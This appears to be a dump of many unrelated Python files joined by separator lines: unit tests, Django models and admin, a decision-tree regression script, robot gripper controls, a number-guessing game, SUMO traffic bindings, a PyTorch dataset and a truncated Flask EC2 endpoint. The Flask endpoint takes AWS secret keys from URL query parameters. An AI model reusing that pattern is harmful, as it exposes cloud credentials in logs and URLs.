import unittest
import json
import schemavalidation
class SchemaValidationTestCase(unittest.TestCase):
def test_event_schema_is_valid(self):
message = json.dumps({
'Timestamp': 1596717736,
'EventType': 'EVENT_TEST',
'ID': 'random-id',
'EmitterId': 'random-emitter-id',
'EmitterType': 'SYSTEM',
'Data': {
'field': 'value'
}
})
is_valid = schemavalidation.validate(message)
self.assertTrue(is_valid)
def test_event_schema_is_invalid(self):
# data field is missing
message = json.dumps({
'Timestamp': 1596717736,
'EventType': 'EVENT_TEST',
'ID': 'random-id',
'EmitterId': 'random-emitter-id',
})
is_valid = schemavalidation.validate(message)
self.assertFalse(is_valid)
def test_event_schema_is_valid_when_data_is_none(self):
message = json.dumps({
'Timestamp': 1596717736,
'EventType': 'EVENT_TEST',
'ID': 'random-id',
'EmitterId': 'random-emitter-id',
'EmitterType': 'SYSTEM',
'Data': None
})
is_valid = schemavalidation.validate(message)
self.assertTrue(is_valid)
if __name__ == '__main__':
unittest.main()
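# The schemavalidation module under test is not shown here. A minimal sketch of
# what these tests exercise, assuming the jsonschema library and inferring the
# schema shape from the cases above (all keys required, Data nullable):
#
# import jsonschema
#
# EVENT_SCHEMA = {
#     "type": "object",
#     "properties": {
#         "Timestamp": {"type": "integer"},
#         "EventType": {"type": "string"},
#         "ID": {"type": "string"},
#         "EmitterId": {"type": "string"},
#         "EmitterType": {"type": "string"},
#         "Data": {"type": ["object", "null"]},
#     },
#     "required": ["Timestamp", "EventType", "ID", "EmitterId", "EmitterType", "Data"],
# }
#
# def validate(message):
#     try:
#         jsonschema.validate(json.loads(message), EVENT_SCHEMA)
#         return True
#     except jsonschema.ValidationError:
#         return False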
|
from django.contrib import admin
from .models import ProductImage, Product
from rest_framework.authtoken.admin import TokenAdmin
TokenAdmin.raw_id_fields = ('user',)
class ProductImageAdmin(admin.StackedInline):
model = ProductImage
#list_display = ('id', 'image')
def get_changeform_initial_data(self, request):
return { 'owner': request.user }
class ProductAdmin(admin.ModelAdmin):
model = Product
list_display = ['id', 'position', 'get_name_en', 'get_name_et',]
def get_changeform_initial_data(self, request):
return { 'owner': request.user }
def get_name_en(self, obj):
return obj.name_en
get_name_en.admin_order_field = 'position'
get_name_en.short_description = 'Name (en)'
def get_name_et(self, obj):
return obj.name_et
get_name_et.admin_order_field = 'position'
get_name_et.short_description = 'Name (et)'
inlines = [ProductImageAdmin]
# Register your models here.
# admin.site.register(ProductImage, ProductImageAdmin)
class MyAdminSite(admin.AdminSite):
# Disable View on Site link on admin page
site_header = "salmefelt"
site_url = None
admin_site = MyAdminSite(name='myadmin')
admin_site.register(Product, ProductAdmin)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Loek Wensveen
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import
# system imports
from . import basetest
from settingslib.basesettings import BaseSettings, Section, Option, Resolver
import settingslib.configfile as configfile
class BaseSettingsTestCase(basetest.BaseTestCase):
def test_default(self):
class Settings(BaseSettings):
SOMETHING = 1
SOME = Option(1, 'int')
SOMETHING3 = Option("3", 'int')
SOMESTR = Option(1, Resolver('str'))
class SUBSECTION(Section):
SOM = 1
SOM3 = 1
settings = Settings()
self.assertEqual(settings.SOMETHING, 1)
self.assertEqual(settings.SOMETHING3, 3)
self.assertEqual(settings.SOME, 1)
self.assertEqual(settings.SOMESTR, "1")
self.assertEqual(settings.SUBSECTION.SOM, 1)
self.assertEqual(settings.SUBSECTION.SOM3, 1)
def test_options(self):
class Settings(BaseSettings):
SOMETHING = 1
SOMETHING3 = 3
SOME = Option(1, 'int')
SOMESTR = Option(1, Resolver('str', **{}))
class SUBSECTION(Section):
SOM = 1
SOM3 = 1
settings = Settings()
settings.set_options({"SOMETHING3": 4, "subsection.som3":3, "some" : 3})
self.assertEqual(settings.SOMETHING3, 4)
self.assertEqual(settings.SOME, 3)
self.assertEqual(settings.SUBSECTION.SOM3, 3)
self.assertEqual(settings.SUBSECTION.SOM, 1)
def test_userconfig(self):
class Settings(BaseSettings):
SOMETHING = 1
SOMETHING3 = 3
SOME = Option(1, 'int')
SOMESTR = Option(1, Resolver('str', **{}))
class SUBSECTION(Section):
SOM = 1
SOM3 = 1
settings = Settings()
config = configfile.ConfigFile()
config["some"] = "3"
settings.__dict__['userconfig'] = config
settings.SOMETHING = 4
settings.SUBSECTION.SOM = 5
self.assertEqual(settings.SOME, 3)
self.assertEqual(config["something"], "4")
self.assertEqual(settings.SOMETHING, 4)
self.assertEqual(config["subsection"]['som'], "5")
self.assertEqual(settings.SUBSECTION.SOM, 5)
def test_classoptions(self):
class Settings(BaseSettings):
class SOMETHING(Option):
"hello I am some help message"
default = 1
resolver = Resolver('int')
save = False
settings = Settings()
self.assertEqual(settings.SOMETHING, 1)
self.assertEqual(settings.help_dict['something'], "hello I am some help message")
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, -1].values
# Fitting the Decision Tree Regression
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state = 0)
regressor.fit(X, y)
# Predicting a new result (predict expects a 2-D array of shape (n_samples, n_features))
y_pred = regressor.predict(np.reshape([6.5], (-1, 1)))
# Visualizing the results
X_grid = np.arange(X.min(), X.max(), 0.1)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.scatter(6.5, y_pred, color = 'green')
plt.title('Salary vs Title')
plt.xlabel('Title')
plt.ylabel('Salary')
plt.show()
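# Note: a decision tree fitted on a single feature predicts a piecewise-constant
# function, so the fine-grained X_grid above makes the prediction steps visible
# instead of drawing straight lines between the training points.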
|
#!/usr/bin/env python
# Copyright (c) 2013-2017, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
SDK Gripper Example: keyboard
"""
import argparse
import rospy
import intera_interface
import intera_external_devices
from intera_interface import CHECK_VERSION
def map_keyboard(limb):
# initialize interfaces
print("Getting robot state...")
rs = intera_interface.RobotEnable(CHECK_VERSION)
init_state = rs.state()
try:
gripper = intera_interface.Gripper(limb)
except ValueError:
rospy.logerr("Could not detect a gripper attached to the robot.")
return
def clean_shutdown():
print("Exiting example.")
rospy.on_shutdown(clean_shutdown)
def offset_position(offset):
current = gripper.get_position()
gripper.set_position(current + offset)
def offset_holding(offset):
current = gripper.get_force()
gripper.set_holding_force(current + offset)
num_steps = 10.0
thirty_percent_velocity = 0.3*(gripper.MAX_VELOCITY - gripper.MIN_VELOCITY) + gripper.MIN_VELOCITY
bindings = {
# key: (function, args, description)
'r': (gripper.reboot, [], "reboot"),
'c': (gripper.calibrate, [], "calibrate"),
'q': (gripper.close, [], "close"),
'o': (gripper.open, [], "open"),
'+': (gripper.set_velocity, [gripper.MAX_VELOCITY], "set 100% velocity"),
'-': (gripper.set_velocity, [thirty_percent_velocity], "set 30% velocity"),
's': (gripper.stop, [], "stop"),
'h': (offset_holding, [-(gripper.MAX_FORCE / num_steps)], "decrease holding force"),
'j': (offset_holding, [gripper.MAX_FORCE / num_steps], "increase holding force"),
'u': (offset_position, [-(gripper.MAX_POSITION / num_steps)], "decrease position"),
'i': (offset_position, [gripper.MAX_POSITION / num_steps], "increase position"),
}
done = False
rospy.loginfo("Enabling robot...")
rs.enable()
print("Controlling grippers. Press ? for help, Esc to quit.")
while not done and not rospy.is_shutdown():
c = intera_external_devices.getch()
if c:
if c in ['\x1b', '\x03']:
done = True
elif c in bindings:
cmd = bindings[c]
cmd[0](*cmd[1])
print("command: %s" % (cmd[2],))
else:
print("key bindings: ")
print(" Esc: Quit")
print(" ?: Help")
for key, val in sorted(bindings.items(),
key=lambda x: x[1][2]):
print(" %s: %s" % (key, val[2]))
# force shutdown call if caught by key handler
rospy.signal_shutdown("Example finished.")
def main():
"""RSDK Gripper Example: Keyboard Control
Use your dev machine's keyboard to control and configure grippers.
Run this example to command various gripper movements while
adjusting gripper parameters, including calibration, velocity,
and force. Uses the intera_interface.Gripper class and the
helper function, intera_external_devices.getch.
"""
epilog = """
See help inside the example with the '?' key for key bindings.
"""
rp = intera_interface.RobotParams()
valid_limbs = rp.get_limb_names()
if not valid_limbs:
rp.log_message(("Cannot detect any limb parameters on this robot. "
"Exiting."), "ERROR")
return
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__,
epilog=epilog)
parser.add_argument(
"-l", "--limb", dest="limb", default=valid_limbs[0],
choices=valid_limbs,
help="Limb on which to run the gripper keyboard example"
)
args = parser.parse_args(rospy.myargv()[1:])
print("Initializing node... ")
rospy.init_node("sdk_gripper_keyboard")
map_keyboard(args.limb)
if __name__ == '__main__':
main()
|
"""
IIPP Mini-Project 2: Guess the Number
Author: Weikang Sun
Date: 6/9/15
codeskulptor source:
http://www.codeskulptor.org/#user40_9uCFBsoLw2_2.py
"""
# template for "Guess the number" mini-project
# input will come from buttons and an input field
# all output for the game will be printed in the console
import simplegui
import random
import math
secret_number = 0
max_range = 100
remaining_guesses = 0
def new_game():
"""
Begins a new game with the specified max_range
"""
global secret_number
compute_max_guesses()
secret_number = random.randrange(0, max_range)
print "New Game: Range [0,", str(max_range) + ")"
print_guesses()
def compute_max_guesses():
"""
helper function to compute the maximum guesses based
on the binary search algorithm
"""
global remaining_guesses
# max guesses is simply the next highest integer
# for the log base two of the max_range
remaining_guesses = int(math.ceil(math.log(max_range, 2)))
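    # e.g. max_range = 100 -> ceil(log2(100)) = ceil(6.64) = 7 guesses,
    #      max_range = 1000 -> ceil(log2(1000)) = ceil(9.97) = 10 guesses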
def print_guesses():
"""
simple method to print the remaining guesses
and check if game over with no guesses left
"""
if remaining_guesses == 0:
print "You ran out of guesses!"
print "Secret number was:", secret_number
print
new_game()
else:
print "Remaining Guesses:", remaining_guesses
print
def range100():
"""
button that changes the range to [0,100) and starts a new game
"""
global max_range
max_range = 100
new_game()
def range1000():
"""
button that changes the range to [0,1000) and starts a new game
"""
global max_range
max_range = 1000
new_game()
def input_guess(input_str):
"""
main game logic goes here when an input is entered
"""
global remaining_guesses
try:
guess = int(input_str)
print "Guess was", int(guess)
remaining_guesses -= 1
if guess < secret_number:
print "Go higher!"
print_guesses()
elif guess > secret_number:
print "Go lower!"
print_guesses()
else:
print "Correct!"
print
new_game()
    except ValueError:
        print "Enter a valid guess (integer)"
print
# create frame
frame = simplegui.create_frame("Guess the Number!", 100, 300)
# register event handlers for control elements and start frame
game100 = frame.add_button("Range: [0, 100)", range100, 150)
game1000 = frame.add_button("Range: [0, 1000)", range1000, 150)
guess = frame.add_input("Guess:", input_guess, 100)
frame.start()
# call new_game
new_game()
|
class MockECR(object):
@property
def aws_account_id(self):
return '12345678'
@property
def registry(self):
return []
@property
def project_repo(self):
return 'nginxdemos'
def project_repo_exists(self):
return True
def create_project_repo(self):
return True
def get_login(self):
return ''
def get_image_by_tag(self, tag):
return 'latest'
@property
def images(self):
return []
def tag_exists(self, tag):
return True
def find_git_sha1_image_tag(self, tag):
return 'latest'
def retag(self, tag, new_tag):
pass
|
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
@login_required(login_url='/login/')
def add_bundle_page_view(request):
"""
This view Renders Create Bundle Page
"""
if not request.user.is_viewer :
context = {
"title": "Create Bundle"
}
        return render(request, 'add_bundle.html', context)
else:
return redirect('/dashboard/')
|
import os
import time
from django.conf import settings
from django.db import models
from django.utils.text import slugify
from django.utils.translation import gettext_lazy as _
from rest_framework.reverse import reverse
from osmaxx.conversion import coordinate_reference_system as crs, output_format, status
from osmaxx.clipping_area.models import ClippingArea
from osmaxx.conversion.converters.converter import convert
from osmaxx.conversion.converters.converter_gis.detail_levels import DETAIL_LEVEL_CHOICES, DETAIL_LEVEL_ALL
def job_directory_path(instance, filename):
return 'job_result_files/{0}/{1}'.format(instance.id, filename)
class Parametrization(models.Model):
out_format = models.CharField(verbose_name=_("out format"), choices=output_format.CHOICES, max_length=100)
out_srs = models.IntegerField(
verbose_name=_("output SRS"), help_text=_("EPSG code of the output spatial reference system"),
null=True, blank=True, default=4326, choices=crs.CHOICES
)
clipping_area = models.ForeignKey(ClippingArea, verbose_name=_('Clipping Area'), on_delete=models.CASCADE)
detail_level = models.IntegerField(verbose_name=_('detail level'), choices=DETAIL_LEVEL_CHOICES, default=DETAIL_LEVEL_ALL)
def __str__(self):
return _("{}: {} as EPSG:{}").format(self.id, self.get_out_format_display(), self.out_srs)
@property
def epsg(self):
return "EPSG:{}".format(self.out_srs)
class Job(models.Model):
callback_url = models.URLField(_('callback url'), max_length=250)
parametrization = models.ForeignKey(verbose_name=_('parametrization'), to=Parametrization, on_delete=models.CASCADE)
rq_job_id = models.CharField(_('rq job id'), max_length=250, null=True)
status = models.CharField(_('job status'), choices=status.CHOICES, default=status.RECEIVED, max_length=20)
resulting_file = models.FileField(_('resulting file'), upload_to=job_directory_path, null=True, max_length=250)
estimated_pbf_size = models.FloatField(_('estimated pbf size in bytes'), null=True)
unzipped_result_size = models.FloatField(
_('file size in bytes'), null=True, help_text=_("without the static files, only the conversion result")
)
extraction_duration = models.DurationField(
_('extraction duration'), help_text=_('time needed to generate the extraction'), null=True
)
own_base_url = models.CharField(
_('own base url'), help_text=_('the url from which this job is reachable'), max_length=250
)
queue_name = models.CharField(
_('queue name'), help_text=_('queue name for processing'), default='default',
max_length=50, choices=[(key, key) for key in settings.RQ_QUEUE_NAMES]
)
def start_conversion(self, *, use_worker=True):
self.rq_job_id = convert(
conversion_format=self.parametrization.out_format,
area_name=self.parametrization.clipping_area.name,
osmosis_polygon_file_string=self.parametrization.clipping_area.osmosis_polygon_file_string,
output_zip_file_path=self._out_zip_path(),
filename_prefix=self._filename_prefix(),
detail_level=self.parametrization.detail_level,
out_srs=self.parametrization.epsg,
use_worker=use_worker,
queue_name=self.queue_name,
)
self.save()
def zip_file_relative_path(self):
return job_directory_path(self, '{}.{}'.format(self._filename_prefix(), 'zip'))
def get_absolute_url(self):
base_uri = self.own_base_url
if base_uri.endswith('/'):
base_uri = base_uri[:-1]
return base_uri + reverse('conversion_job-detail', kwargs={'pk': self.id})
def _out_zip_path(self):
# assure path exists
complete_zip_file_path = os.path.join(
settings.MEDIA_ROOT, self.zip_file_relative_path()
)
os.makedirs(os.path.dirname(complete_zip_file_path), exist_ok=True)
return complete_zip_file_path
@property
def get_absolute_file_path(self):
if self.has_file:
return self.resulting_file.path
return None
def _filename_prefix(self):
return '{basename}_{srs}_{date}_{out_format}_{detail_level}'.format(
basename=slugify(self.parametrization.clipping_area.name),
srs=slugify(self.parametrization.get_out_srs_display()),
date=time.strftime("%Y-%m-%d"),
out_format=self.parametrization.out_format,
detail_level=slugify(self.parametrization.get_detail_level_display()),
)
@property
def has_file(self):
return bool(self.resulting_file)
def delete(self, *args, **kwargs):
if self.has_file:
os.unlink(self.resulting_file.path)
        return super().delete(*args, **kwargs)
def __str__(self):
return _("job {} with rq_id {} ({})").format(self.id, self.rq_job_id, self.parametrization.clipping_area.name)
|
A, B = map(int, input().split())
result = []
if A >= B:
result.extend(range(1, A + 1))
result.extend(-x for x in range(1, B))
result.append(-sum(result))
else:
result.extend(-x for x in range(1, B + 1))
result.extend(range(1, A))
result.append(-sum(result))
print(*result)
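# Worked example: for input "3 2", A >= B, so result starts as [1, 2, 3], then
# gets [-1] (the negatives up to B-1), and finally appends -(1+2+3-1) = -5,
# printing "1 2 3 -1 -5": three positive and two negative integers summing to zero.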
|
def minion_game(s):
vowels = 'AEIOU'
k_score = 0
s_score = 0
for i in range(len(s)):
if s[i] in vowels:
k_score += (len(s)-i)
else:
s_score += (len(s)-i)
    if k_score > s_score:
        print("Kevin", k_score)
    elif k_score < s_score:
        print("Stuart", s_score)
    else:
        print("Draw")
|
from django.apps import AppConfig
class NewscategoryConfig(AppConfig):
name = 'newsCategory'
|
from django.db import models
from rest_framework import serializers
class sponsors(models.Model):
    name = models.CharField(max_length=150, null=True, blank=True)
    sponsor_type = models.CharField(max_length=150, null=True, blank=True)
    website = models.CharField(max_length=150, null=True, blank=True)
    phone_number = models.IntegerField(null=True, blank=True)
    logo = models.FileField(null=True, blank=True, upload_to='sponsors/')
class robothonAbstract(models.Model):
    title = models.CharField(max_length=150, null=True, blank=True)
    xfile = models.FileField(null=True, blank=True, upload_to='robothonAbstract/')
class roboExpoAbstract(models.Model):
    title = models.CharField(max_length=150, null=True, blank=True)
    xfile = models.FileField(null=True, blank=True, upload_to='robothonExpoAbstract/')
class SponsorSerializer(serializers.ModelSerializer):
class Meta:
model = sponsors
fields = '__all__'
class RobothonSerializer(serializers.ModelSerializer):
class Meta:
model = robothonAbstract
fields = '__all__'
class RoboExpoSerializer(serializers.ModelSerializer):
class Meta:
model = roboExpoAbstract
fields = '__all__'
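# Example usage (a sketch; assumes Django is configured and migrations applied):
# sponsor = sponsors.objects.create(name="Acme", sponsor_type="Gold",
#                                   website="https://acme.example")
# data = SponsorSerializer(sponsor).data  # dict with all model fields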
|
# -*- coding: utf-8 -*-
"""
@file inductionloop.py
@author Michael Behrisch
@author Daniel Krajzewicz
@date 2011-03-16
@version $Id: inductionloop.py 15031 2013-11-05 19:52:41Z behrisch $
Python implementation of the TraCI interface.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2011-2013 DLR (http://www.dlr.de/) and contributors
This file is part of SUMO.
SUMO is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
"""
import traci
import traci.constants as tc
def readVehicleData(result):
result.readLength()
nbData = result.readInt()
data = []
for i in range(nbData):
result.read("!B")
vehID = result.readString()
result.read("!B")
length = result.readDouble()
result.read("!B")
entryTime = result.readDouble()
result.read("!B")
leaveTime = result.readDouble()
result.read("!B")
typeID = result.readString()
        data.append([vehID, length, entryTime, leaveTime, typeID])
return data
_RETURN_VALUE_FUNC = {tc.ID_LIST: traci.Storage.readStringList,
tc.ID_COUNT: traci.Storage.readInt,
tc.VAR_POSITION: traci.Storage.readDouble,
tc.VAR_LANE_ID: traci.Storage.readString,
tc.LAST_STEP_VEHICLE_NUMBER: traci.Storage.readInt,
tc.LAST_STEP_MEAN_SPEED: traci.Storage.readDouble,
tc.LAST_STEP_VEHICLE_ID_LIST: traci.Storage.readStringList,
tc.LAST_STEP_OCCUPANCY: traci.Storage.readDouble,
tc.LAST_STEP_LENGTH: traci.Storage.readDouble,
tc.LAST_STEP_TIME_SINCE_DETECTION: traci.Storage.readDouble,
tc.LAST_STEP_VEHICLE_DATA: readVehicleData}
subscriptionResults = traci.SubscriptionResults(_RETURN_VALUE_FUNC)
def _getUniversal(varID, loopID):
result = traci._sendReadOneStringCmd(tc.CMD_GET_INDUCTIONLOOP_VARIABLE, varID, loopID)
return _RETURN_VALUE_FUNC[varID](result)
def getIDList():
"""getIDList() -> list(string)
Returns a list of all induction loops in the network.
"""
return _getUniversal(tc.ID_LIST, "")
def getIDCount():
"""getIDCount() -> integer
Returns the number of induction loops in the network.
"""
return _getUniversal(tc.ID_COUNT, "")
def getPosition(loopID):
"""getPosition(string) -> double
Returns the position measured from the beginning of the lane in meters.
"""
return _getUniversal(tc.VAR_POSITION, loopID)
def getLaneID(loopID):
"""getLaneID(string) -> string
Returns the id of the lane the loop is on.
"""
return _getUniversal(tc.VAR_LANE_ID, loopID)
def getLastStepVehicleNumber(loopID):
"""getLastStepVehicleNumber(string) -> integer
Returns the number of vehicles that were on the named induction loop within the last simulation step.
"""
return _getUniversal(tc.LAST_STEP_VEHICLE_NUMBER, loopID)
def getLastStepMeanSpeed(loopID):
"""getLastStepMeanSpeed(string) -> double
Returns the mean speed in m/s of vehicles that were on the named induction loop within the last simulation step.
"""
return _getUniversal(tc.LAST_STEP_MEAN_SPEED, loopID)
def getLastStepVehicleIDs(loopID):
"""getLastStepVehicleIDs(string) -> list(string)
Returns the list of ids of vehicles that were on the named induction loop in the last simulation step.
"""
return _getUniversal(tc.LAST_STEP_VEHICLE_ID_LIST, loopID)
def getLastStepOccupancy(loopID):
"""getLastStepOccupancy(string) -> double
Returns the percentage of time the detector was occupied by a vehicle.
"""
return _getUniversal(tc.LAST_STEP_OCCUPANCY, loopID)
def getLastStepMeanLength(loopID):
"""getLastStepMeanLength(string) -> double
Returns the mean length in m of vehicles which were on the detector in the last step.
"""
return _getUniversal(tc.LAST_STEP_LENGTH, loopID)
def getTimeSinceDetection(loopID):
"""getTimeSinceDetection(string) -> double
Returns the time in s since last detection.
"""
return _getUniversal(tc.LAST_STEP_TIME_SINCE_DETECTION, loopID)
def getVehicleData(loopID):
"""getVehicleData(string) -> integer
Returns a complex structure containing several information about vehicles which passed the detector.
"""
return _getUniversal(tc.LAST_STEP_VEHICLE_DATA, loopID)
def subscribe(loopID, varIDs=(tc.LAST_STEP_VEHICLE_NUMBER,), begin=0, end=2**31-1):
"""subscribe(string, list(integer), double, double) -> None
Subscribe to one or more induction loop values for the given interval.
"""
traci._subscribe(tc.CMD_SUBSCRIBE_INDUCTIONLOOP_VARIABLE, begin, end, loopID, varIDs)
def getSubscriptionResults(loopID=None):
"""getSubscriptionResults(string) -> dict(integer: <value_type>)
Returns the subscription results for the last time step and the given loop.
If no loop id is given, all subscription results are returned in a dict.
If the loop id is unknown or the subscription did for any reason return no data,
'None' is returned.
It is not possible to retrieve older subscription results than the ones
from the last time step.
"""
return subscriptionResults.get(loopID)
def subscribeContext(loopID, domain, dist, varIDs=(tc.LAST_STEP_VEHICLE_NUMBER,), begin=0, end=2**31-1):
traci._subscribeContext(tc.CMD_SUBSCRIBE_INDUCTIONLOOP_CONTEXT, begin, end, loopID, domain, dist, varIDs)
def getContextSubscriptionResults(loopID=None):
return subscriptionResults.getContext(loopID)
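# Example usage (a sketch; assumes a SUMO instance listening on port 8813 with
# an induction loop "loop0" defined in the network):
# import traci
# traci.init(8813)
# subscribe("loop0")
# while traci.simulation.getMinExpectedNumber() > 0:
#     traci.simulationStep()
#     print(getSubscriptionResults("loop0"))
# traci.close()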
|
# coding: utf-8
"""
Uptrends API v4
This document describes Uptrends API version 4. This Swagger environment also lets you execute API methods directly. Please note that this is not a sandbox environment: these API methods operate directly on your actual Uptrends account. For more information, please visit https://www.uptrends.com/api. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import uptrends
from uptrends.api.sla_api import SLAApi # noqa: E501
from uptrends.rest import ApiException
class TestSLAApi(unittest.TestCase):
"""SLAApi unit test stubs"""
def setUp(self):
self.api = uptrends.api.sla_api.SLAApi() # noqa: E501
def tearDown(self):
pass
def test_sla_create_sla(self):
"""Test case for sla_create_sla
Creates a new SLA. # noqa: E501
"""
pass
def test_sla_delete_exclusion_period(self):
"""Test case for sla_delete_exclusion_period
Deletes the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_delete_sla(self):
"""Test case for sla_delete_sla
Deletes the specified SLA. # noqa: E501
"""
pass
def test_sla_get_exclusion_period(self):
"""Test case for sla_get_exclusion_period
Gets the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_get_exclusion_periods(self):
"""Test case for sla_get_exclusion_periods
Gets a list of all exclusion periods for the specified SLA. # noqa: E501
"""
pass
def test_sla_get_sla(self):
"""Test case for sla_get_sla
Gets the specified SLA definition. # noqa: E501
"""
pass
def test_sla_get_slas(self):
"""Test case for sla_get_slas
Gets a list of all SLA definitions. # noqa: E501
"""
pass
def test_sla_patch_exclusion_period(self):
"""Test case for sla_patch_exclusion_period
Partially updates the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_patch_sla(self):
"""Test case for sla_patch_sla
Partially updates the definition of the specified SLA. # noqa: E501
"""
pass
def test_sla_post_exclusion_period(self):
"""Test case for sla_post_exclusion_period
Creates a new exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_put_exclusion_period(self):
"""Test case for sla_put_exclusion_period
Updates the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_put_sla(self):
"""Test case for sla_put_sla
Updates the definition of the specified SLA. # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
import json
from pathlib import Path
from typing import List, Union
from PIL import Image
from torchvision import transforms
from torch.utils.data import Dataset
NORMALIZE_DEFAULT = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
class EasySet(Dataset):
"""
A ready-to-use dataset. Will work for any dataset where the images are
grouped in directories by class. It expects a JSON file defining the
classes and where to find them. It must have the following shape:
{
"class_names": [
"class_1",
"class_2"
],
"class_roots": [
"path/to/class_1_folder",
"path/to/class_2_folder"
]
}
"""
def __init__(self, specs_file: Union[Path, str], image_size=224, training=False):
"""
Args:
specs_file: path to the JSON file
image_size: images returned by the dataset will be square images of the given size
training: preprocessing is slightly different for a training set, adding a random
cropping and a random horizontal flip.
"""
specs = self.load_specs(Path(specs_file))
self.images, self.labels = self.list_data_instances(specs["class_roots"])
self.class_names = specs["class_names"]
self.transform = self.compose_transforms(image_size, training)
@staticmethod
def load_specs(specs_file: Path) -> dict:
"""
Load specs from a JSON file.
Args:
specs_file: path to the JSON file
Returns:
dictionary contained in the JSON file
Raises:
ValueError: if specs_file is not a JSON, or if it is a JSON and the content is not
of the expected shape.
"""
if specs_file.suffix != ".json":
raise ValueError("EasySet requires specs in a JSON file.")
with open(specs_file, "r") as file:
specs = json.load(file)
if "class_names" not in specs.keys() or "class_roots" not in specs.keys():
raise ValueError(
"EasySet requires specs in a JSON file with the keys class_names and class_roots."
)
if len(specs["class_names"]) != len(specs["class_roots"]):
raise ValueError(
"Number of class names does not match the number of class root directories."
)
return specs
@staticmethod
def compose_transforms(image_size: int, training: bool) -> transforms.Compose:
"""
Create a composition of torchvision transformations, with some randomization if we are
building a training set.
Args:
image_size: size of dataset images
training: whether this is a training set or not
Returns:
compositions of torchvision transformations
"""
return (
transforms.Compose(
[
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(**NORMALIZE_DEFAULT),
]
)
if training
else transforms.Compose(
[
transforms.Resize([int(image_size * 1.15), int(image_size * 1.15)]),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Normalize(**NORMALIZE_DEFAULT),
]
)
)
@staticmethod
def list_data_instances(class_roots: List[str]) -> (List[str], List[int]):
"""
Explore the directories specified in class_roots to find all data instances.
Args:
class_roots: each element is the path to the directory containing the elements
of one class
Returns:
list of paths to the images, and a list of same length containing the integer label
of each image
"""
images = []
labels = []
for class_id, class_root in enumerate(class_roots):
class_images = [
str(image_path)
for image_path in sorted(Path(class_root).glob("*"))
if image_path.is_file()
]
images += class_images
labels += len(class_images) * [class_id]
return images, labels
def __getitem__(self, item: int):
"""
Get a data sample from its integer id.
Args:
item: sample's integer id
Returns:
data sample in the form of a tuple (image, label), where label is an integer.
The type of the image object depends of the output type of self.transform. By default
it's a torch.Tensor, however you are free to define any function as self.transform, and
therefore any type for the output image. For instance, if self.transform = lambda x: x,
then the output image will be of type PIL.Image.Image.
"""
        # Some images of ILSVRC2015 are grayscale, so we convert everything to RGB for consistency.
# If you want to work on grayscale images, use torch.transforms.Grayscale in your
# transformation pipeline.
img = self.transform(Image.open(self.images[item]).convert("RGB"))
label = self.labels[item]
return img, label
def __len__(self) -> int:
return len(self.labels)
def number_of_classes(self):
return len(self.class_names)
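# Example usage (a sketch; "specs.json" and the class directories it lists are
# assumed to exist):
# train_set = EasySet(specs_file="specs.json", image_size=224, training=True)
# image, label = train_set[0]  # torch.Tensor of shape (3, 224, 224) and an int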
|
from flask import Flask, request, jsonify
from config import config
import logging
import boto3
app = Flask(__name__)
logging.basicConfig(
filename=config['log_file'],
level=config['log_level']
)
def get_aws_client(request):
aws_access_key_id = request.args.get("aws_access_key_id")
aws_secret_access_key = request.args.get("aws_secret_access_key")
region_name = request.args.get("region_name")
return boto3.client('ec2',
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
region_name=region_name
)
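# Example request (a sketch; note that passing AWS credentials as query
# parameters is only reasonable for local testing):
# curl "http://<api_host>:<api_port>/ec2/list?aws_access_key_id=...&aws_secret_access_key=...&region_name=us-east-1"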
# Endpoint: http://<api_host>:<api_port>/ec2/list
@app.route('/ec2/list', methods=['GET'])
def aws_list():
